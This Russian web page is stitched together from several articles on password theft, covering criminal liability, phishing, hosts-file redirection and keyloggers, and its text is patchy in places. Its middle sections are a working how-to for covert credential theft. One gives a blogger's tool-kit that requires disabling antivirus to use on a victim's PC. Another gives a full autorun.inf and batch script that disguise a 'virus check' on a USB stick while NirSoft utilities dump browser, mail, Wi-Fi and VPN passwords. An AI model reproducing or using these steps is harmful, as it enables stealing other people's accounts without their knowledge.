Как украсть все пароли с компьютера. Способы «взлома» — кражи ваших аккаунтов и паролей вконтакте. Насколько реальна кража пароля Вконтакте

Не все знают о том, что кража пароля в социальной сети либо на любом другом онлайн-ресурсе является уголовно наказуемым преступлением. Насколько реальна такая кража, какое наказание за нее может получить правонарушитель, и что делать, если вы стали жертвой, расскажем ниже.

Насколько реальна кража пароля Вконтакте?

Завладение паролем ВК вполне реально, такая кража может повлечь негативные последствия для владельца аккаунта. В интернете можно найти множество историй о том, как учетные записи взламывали с целью получения личной информации или распространения сведений, порочащих репутацию владельца.

Кражи осуществляются самыми разными способами:

  • при помощи фишинга: пользователь перенаправляется на ложную страницу сайта, где его просят ввести логин и пароль, которыми затем завладевают злоумышленники;
  • путем подбора комбинаций: этот способ действует в том случае, если пароль слишком простой;
  • в результате обманных действий со стороны знакомых или незнакомых людей (когда комбинацию просто подсмотрели в компьютере или смартфоне, пользуясь отсутствием владельца гаджета).

Обратите внимание!

Вне зависимости от способа действия злоумышленника являются уголовно наказуемыми. Состав преступления образуется по ст. 272 УК РФ (неправомерный доступ к компьютерной информации).


Что делать, если вас взломали?

Если вы стали жертвой взлома в социальной сети Вконтакте или в любой другой, то первое, что вам необходимо сделать, - это обратиться в службу поддержки с просьбой заблокировать аккаунт. Возможно, придется предоставить какие-то доказательства того, что именно вы являетесь владельцем профиля.

Если украденный пароль установлен еще где-то, будь то социальные сети, электронная почта и т.п., то необходимо обязательно поменять комбинации на всех остальных сервисах.

Обратите внимание!

Специалисты по компьютерной безопасности не рекомендуют устанавливать один и тот же пароль на разных сайтах, поскольку в подобных случаях злоумышленники, завладевшие одним аккаунтом, без труда смогут взломать и остальные.

Всех друзей, родственников и знакомых стоит предупредить о том, что ваш профиль был взломан. Злоумышленники могут попытаться рассылать от вашего имени различные сообщения, содержащие вредоносные ссылки или просьбы о помощи. Ваши друзья могут пострадать, если поверят и нажмут на ссылку либо перечислят деньги на указанный в сообщении счет или номер мобильного телефона.

Если действиями правонарушителя вам был причинен серьезный вред, то имеет смысл обратиться в правоохранительные органы. Для этого потребуется написать заявление в полицию, в котором должна содержаться просьба о привлечении злоумышленников к ответственности по ст. 272 УК РФ. Согласно этой статье неправомерный доступ будет уголовно наказуемым лишь в том случае, если информация была:

  • уничтожена;
  • заблокирована;
  • модифицирована;
  • скопирована.

Учитывая тот факт, что под блокированием подразумевается, в том числе, целенаправленное затруднение доступа законных пользователей к данным, кража пароля ВК подпадает под санкции ст. 272 УК РФ.

За подобные деяния предусмотрены следующие виды наказания:

  • штраф до 200 000 рублей (или в размере зарплаты правонарушителя за 18 месяцев);
  • исправительные работы на срок до 1 года;
  • ограничение свободы, принудительные работы или тюремное заключение на срок до 2 лет.

При рассмотрении дела суд будет решать, какое именно из перечисленных наказаний назначить. Оно будет зависеть, в том числе от степени вреда, причиненного владельцу аккаунта и иным лицам. Если был причинен крупный ущерб (на сумму более 1 000 000 рублей), то размер штрафа может возрасти до 300 000 рублей, а срок тюремного заключения - до 4 лет.

Обратите внимание!

Крупный ущерб может быть причинен в случае взлома аккаунта коммерческой фирмы. В подобных ситуациях речь может идти также и о защите деловой репутации, пострадавшей в результате действий злоумышленников.

Как обезопасить себя от кражи пароля?

Существуют вполне определенные и понятные правила того, как вести себя, чтобы защититься от кражи:

  • не используйте слишком простые комбинации, особенно состоящие из даты вашего рождения, имени и фамилии и т.п. Их очень просто взломать. Хорошо, если пароль будет состоять из набора бессвязных букв, цифр, нескольких знаков препинания;
  • не переходите по подозрительным ссылкам, не вводите свои данные на подозрительных сайтах;
  • не сохраняйте свои пароли на незнакомых устройствах, а лучше вообще никогда не сохраняйте их в браузерах;
  • старайтесь не заходить в свои аккаунты с публичных wi-fi сетей;
  • если это возможно, пользуйтесь хранилищем паролей наподобие KeePass.

Если вы уже стали жертвой злоумышленников, обратитесь за помощью к нашим юристам. Они помогут на всех этапах, начиная с составления и направления заявления в полицию и заканчивая судебным разбирательством. Звоните нам или оставляйте свое сообщение на сайте.

Как украсть пароли из windows .

Всем привет, сегодня позволю себе “зацепить” ещё одну тему, которая будет, как мне кажется, интересна многим. Мы создадим специальный инструмент, который позволит нам отобразить и сохранить все пароли, которые сохранены в windows. В вашей или чужой. Проще говоря, украсть пароли .

Разовьём тему. Какими браузерами вы пользуетесь? Сколько их в windows ? Глупый вопрос: вы пользуетесь социальными сетями? Другими социальными проектами? У каждого из нас таких ресурсов не мало. Каждый из них требует пароля, который хранится в этом же браузере. Это удобно. Но не безопасно, и сейчас вы увидите почему. Есть утилиты, которые позволят украсть пароли из браузеров любых мастей для сайтов.

Забыли пароль к роутеру? Или у вас отдельный кабель? Никакой разницы – утилита в составе пакета позволит украсть пароли к интернету . Вы приобрели Windows честно за свои кровные? Она была установлена вместе с купленным компьютером и ноутбуком? А ведь всякий раз при выходе в сеть Windows сверяется с базой на предмет результатов проведённой . Уникальный ключ активации Windows – обязательное условие проверки подлинности. Где он хранится, мы тоже поговорим. Есть утилита, которая позволит украсть ключи и пароли к системе . Там же будет и ключ к пакету Microsoft Office…

как на ладони…

Почтовые клиенты на компьютере имеются? Microsoft Outlook, Filezilla, Mozilla Thunderburd ? При входе в почту почтовый клиент отправляет пароли к почтовым ящикам на сервера почтовых серверов… Есть утилита, которая позволит украсть пароли к почтовым ящикам .

Сейчас я вам покажу, как можно будет выдернуть самое сокровенное из windows всего в пару кликов мышью.

И пароли даже удалённых программ и браузеров в любом виде.

Как украсть пароли из windows?

Мы будем пользоваться программами от NirSoft. У разработчиков немало “полезных” утилит. Мы рассмотрим сейчас те из них, что помогут нам в конкретных задачах. Все представленные программы имеют портативную версию, установки не потребуют. На сайте производителя вы можете скачать и файлы русификации, однако для того, чтобы украсть пароли из системы , они не очень важны.

Для того, чтобы ” украсть пароли ” из windows, нам понадобятся:

  • свободная флешка (её можно будет использовать по прямому назначению и после того, как она будет “заточена” под выуживание паролей);
  • сборник собственно программ (вы можете скачать его прямо с моего сайта)
  • пару манипуляций с документами Блокнота.
  • Половина из таких программ определяется как “зловред” ещё на стадии скачивания браузером. Что уж про антивирусы говорить… Так что перед использованием созданного вами инструмента антивирус придётся ОТКЛЮЧИТЬ.
  • запуск некоторых утилит потребует прав администратора

ГАРАНТИРУЮ, ЧТО В СКАЧИВАЕМОЙ СБОРКЕ ВИРУСОВ НЕТ. ОДНАКО ХАРАКТЕР ДЕЙСТВИЯ ПРОГРАММ ПОХОЖ НА ДЕЙСТВИЯ СНИФЕРОВ. ТАК ЧТО АНТИВИРУС НЕ РАЗ СООБЩИТ О “ПРОБЛЕМАХ”.

Начинаем работу.

  • Отключим антивирус. Временно.
  • . Он запакован мною дважды, чтобы хоть немного потянуть время и не попасть под “бан” поисковых систем, которые подобные программы недолюбливают. Пароль к архиву

computer76

  • Готовим нашу флешку. Да готовить нечего, места потребуется мало. Почему флешка? Она портативна, порой мала в размерах и даже незаметна. Ваши манипуляции могут остаться незаметными даже для жертвы, которая должна отлучиться на кухню попить кофейку.
  • Распакуйте программы на флешку. Не в какую-нибудь папку, а по прямому пути, чтобы они были доступны при открытии флешки. Распакованные утилиты скопом будет запускать bat файл с именем start .

Этот bat файл создан в обычном Блокноте. , читайте здесь. В документ внесён код автоматического запуска утилит и сохранения их в соответствующие текстовые файлы. Вы можете его переименовать и просмотреть его состав с помощью того же Блокнота.

После запуска батника каждая из программ откроется в отдельном окне со всеми вашими (или чужими) паролями и/или попробует создать текстовый файл, в котором будут отображены найденные пароли Opera , Firefox , Internet Explorer , почтовых клиентов и самой Windows . Всё займёт несколько секунд. Потренируйтесь на своём компьютере не спеша.

Как правильно, быстро и максимально незаметно использовать приобретённые навыки на чужом компьютере, рассмотрим в одной из следующих статей.

Прочитано: 321

На какие только ухищрения не идут злоумышленники, чтобы выкрасть у пользователя пароли к всевозможным сетевым ресурсам — страничкам в соцсетях, играм-онлайн, платёжным системам. Статистика кражи личных данных в сети пестрит тревожными цифрами. Чтобы не оказаться в числе жертв, потерявших свои аккаунты, давайте рассмотрим основные методы воровства паролей, которые используют хакеры — , и . Имея представление об этих зловредных «технологиях», им можно достаточно эффективно противостоять, соблюдая должный уровень безопасности и конфиденциальности личных данных.

Торжество справедливости и отмщения наступает в период кормёжки. Птенчики малюры, завидев приближающихся к гнезду родителей с вкусняшками в клюве, начинают, что есть силы трезвонить, ту самую трель, которую их научили петь в первые дни жизни. Получают еду, только исполнители «родного мотива» — законные наследники, а птенцы кукушки остаются ни с чем и вскоре умирают от голода.

На первый взгляд животрепещущая картина природы, но как она похожа на бескрайние просторы цифровых джунглей Интернета: и тут есть пароли; и тут есть персонажи — злые и добрые — хакеры и обычные пользователи.

Итак, уважаемый читатель, чтобы сберечь свои заветные логины и пароли, от подлых людишек, конечно трели вам разучивать не придётся. Но вот ознакомиться со способами похищения личных данных, совсем не будет лишним... Хотите мира? Готовьтесь к войне!

Главные орудия злоумышленника в этом способе - наивность и чрезмерное любопытство пользователя. Никаких изощрённых программных методов, коварных вирусов и прочих хакерских технологий.

Злодей, зная только логин от почтового ящика, вводит его в форму входа на сервис. А затем сообщает системе, что забыл пароль. На мониторе высвечивается контрольный вопрос — взломщик не знает на него ответ, но уже знает его содержание. Вот тут-то и начинается самое «интересное»: на основе темы вопроса он отправляет жертве «хитрое письмо», в котором в завуалированной форме пытается выведать правильный ответ. Коварное послание может выглядеть примерно так: «Добрый день! Мы, кулинарный сайт такой-то, ..... и т.д. А какое ваше любимое блюдо?» И это лишь отдельный пример. Ухищрений такого рода «гуляет по сети» великое мн ожество . Подробнее о социальной инженерии мы писали статье. Так что смотрите в оба, читая письма!

Кража куки (cookie)

Куки (от англ. «cookie» — печенье) — файл с данными сессии, которые веб-сайт сохраняет в браузере пользователя. В нём, в захешированном виде, хранятся логин, пароль, id и прочая информация, к которой в процессе онлайн-работы периодически обращается ресурс.

Хакер, зная уязвимости конкретного сайта (форум, почтовый сервис, соцсеть), пишет специальный скрипт, который «вытягивает» куки из браузера жертвы и отправляет ему. Без участия владельца аккаунта, это «чёрное дело» не обходится, так как именно он должен запустить зловредный скрипт. Поэтому код, перед отправкой, оборачивается в специальную «приманку»: в картинку, завлекающее письмо, просьбу и т.д. Главная задача — чтобы жертва перешла по предложенной ссылке. И если это всё-таки случается, хакерский скрипт куки из браузера передаёт снифферу (перехватчику сетевого трафика), установленному на стороннем хостинге. И только потом направляет пользователя, куда ему было обещано в сообшении — на сайт знакомств, видеохостинг, фотогалерею и пр. Естественно, владелец аккаунта об этих манипуляциях ничего не подозревает — вероломная процедура занимает всего 5 секунд.

Чтобы оставить взломщика, использующего брутфорс, с носом, создавайте сложные пароли, пользуйтесь .



реальным тюремным сроком!

Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила.

Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.

Скачаем Password Recovery утилиты, которые нам потребуются:

* MessenPass - восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;

* Mail PassView - извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;

* IE Passview - отображает логины и пароли, сохраненные "осликом";

* ChromePass - отображает логины и пароли, сохраненные браузером Google Chrom;

* PasswordFox - получает все пароли, сохраненные Firefox"oм;

* Protected Storage PassView - восстанавливает все пароли, сохраненные в защищенном хранилище;

* Dialupass - вытаскивает все пароли dialup/VPN сессий;

* Network Password Recovery - отображает пароли которые вы используете для шар в локальной сети а так же пароли.NET Passport/Messenger account;

* PstPassword - извлекает пароли из файлов личных папок Outlook - .PST;

* WirelessKeyView - восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере.

Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор.
Все утилиты можно взять .

Еще нам необходима утилитка Hidden Start ().

Так же скачаем для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране.

Подготавливаем флэшку.

1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\

2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe

3. В корне флешки создаем autorun.inf со следующим содержанием:


open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы


Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.

4. Создаем батник launch.bat:

echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt

If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe

Рассмотрим команды батника поподробнее:

echo off – запрет на вывод в окно CMD результатов выполнения

echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время

start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt

Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.

start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского

Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.

Как же бороться?

1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet.

3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит.

Поводом для написания этой статьи стала заметка в журнале "Хакер".

Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!

Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!

За последние дни в новостях рассказали, что в Интернете выложили логины и пароли от миллионов почтовых ящиков почты Гугла (Gmail), почты Яндекса и почты mail.ru. Подобрать любой мало-мальски сложный пароль невозможно, поскольку большинство сервисов настроено так, что после нескольких ошибок предлагает пользователю вводить капчу, либо же просто блокирует IP с которого ведётся брутфорсинг. В подавляющем большинстве в утечке паролей виноваты не хитроумные взломы популярных сервисов, а сами пользователи, которые допустили компрометацию пароля. Поэтому хотелось бы коснуться вопроса, как хакеры воруют ваши пароли и что можно сделать, чтобы это предотвратить.

1. Поддельные страницы авторизации

Суть заключается в следующем. Под любым предлогом пользователя заманивают на сайт хакера. Зачастую, на этом сайте одна единственная страница, но выглядит она в точности, как настоящая страница для авторизации в вашем почтовом ящике. Невнимательный пользователь вводит логин и пароль, которые прямиком попадают к злоумышленнику.

Как бороться:

– каждый раз, когда возникает необходимость авторизации, посмотрите на домен. Зачастую, злоумышленники могут создавать созвучные доменные имена, например:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

Каждый из этих доменов не имеет ни какого отношения к популярным почтовым сервисам. Как правило, авторизация запрашивается не каждый раз, поэтому прежде чем ввести пароль потратьте некоторое время на изучение доменного имени.

Отдельно стоит обратить внимание на то, как хакеры пытаются заманить вас на свои зловредные страницы. Приведу несколько примеров, но ими варианты не исчерпываются:

– вам на почту приходит письмо, в котором сообщается, что вы, что-то получили (открытку или что-то другое приятное, или наоборот – что-то очень неприятное и требуются ваши немедленные действия, чтобы аккаунт не заблокировали, деньги не потерялись и т.д.) и есть ссылка по которой надо перейти;

– в смс сообщается, что вы получили письмо и предлагается перейти по ссылке, чтобы прочитать это письмо (чтобы у мужчин отключился мозг, может быть уточнено, что письмо отлучен от <любое женское имя>).

– во всплывающих окнах на сайтах или в программах сообщается, что вы получили письмо.

Помните об этом, будьте просто внимательны. Обращайте внимание на мелочи. Например, зачастую мы выбираем в браузере опцию «Сохранить пароль», и когда настоящий почтовый сервис просит повторно авторизоваться (это случается время от времени), то оба окошечка (и логин и пароль) зачастую уже заполнены и нам нужно нажать только кнопку входа. Хакеры могут вписать ваш логин (особенно если отправляли вредоносную ссылку вам по почте), но хакеры не могут вписать пароль. Поэтому, если вы заметили необычное поведение, внимательно изучите домен. Если домен правильный, но всё равно что-то не так, то возможно у вас другая проблема, которая рассмотрена в следующем пункте.

2. Переадресация через файл hosts

В любом компьютере под управлением операционной системы Windows есть файл hosts, который располагается в каталоге C:WindowsSystem32Driversetc

Там можно прописать переадресацию. В результате которой домен в адресной строке вашего браузера будет совершенно истинным, но в реальности вы будете попадать на страничку авторизации хакеров, которые, естественно, украдут ваш пароль:

На что обратить внимание:

– откройте любым текстовым редактором файл C:WindowsSystem32Driversetchosts и посмотрите в него — там не должно быть упоминаний популярных сайтов, или чего-то подозрительного;

– ещё одним показателем является то, что вы вводите верные логин и пароль, но авторизация не происходит;

– на странице авторизации вас просят отправить смс на короткий номер под любым предлогом (подтверждения телефона, попытка взлома и подтверждения, что это вы, акаунт не активен и будет удалён если не подтвердить, необходимо ввести числа полученные в ответном смс сообщении и т. д.).

Как с этим бороться:

– обычно, файл hosts изменяется вирусами, необходимо установить антивирусную программу, если таковой нет и проверить компьютер. Если антивирусная программа есть, обновите её и проверьте компьютер.

– удалить лишние строки из файла hosts

3. Программы для отслеживания нажатий на клавиатуре (килогеры)

Ещё одним вариантом являются килогеры. Это такие программы, которые перехватывают всё, что вы набираете на клавиатуре и отправляют хакеру. Фактически, это вирусы, и бороться с этими программами нужно точно так же как и с другими вирусами. Если вашу почту постоянно «взламывают», то проверьте компьютер антивирусом, не скачивайте подозрительные исполняемые файлы (у них расширение.exe, .msi, .hta, .scr, могут быть и некоторые другие, но в чаще всего всё-таки.exe). Установите антивирус, который может обновляться, регулярно его обновляйте и проверяйте свой компьютер (ну или переходите на Linux).

Как с этим бороться:

– если вы обнаружили вирус, то, на всякий случай, поменяйте свои пароли от почты и от социальных сетей;

– об этом уже говорилось, но это такая распространённая ошибка, что подчеркну ещё раз, не скачивайте исполняемые файлы из подозрительных источников. Скачивайте их с официальных сайтов. Не скачивайте файлы, присланные вам почту от незнакомых людей (даже если это фотографии "меня в купальнике" и т.п.). Относитесь с осторожностью к исполняемым файлам, даже если они присланы знакомыми вам людьми – могло получиться так, что их почту взломали раньше вашей и от их имени хакер рассылает свои вредоносные программы;

– в Интернет кафе и во всех ситуациях, когда нужно залогиниться на чужом компьютере, используйте экранную клавиатуру, это не является 100% гарантией, но многим килогерам такой поворот будет не по зубам.

Как бы это уныло не звучало, но именно такими тривиальными путями большинство пользователей теряют свои пароли, и здесь не имеют место ни сложные хакерские атаки на почтовые сервисы, ни изощрённый криптоанализ.

Статьи по теме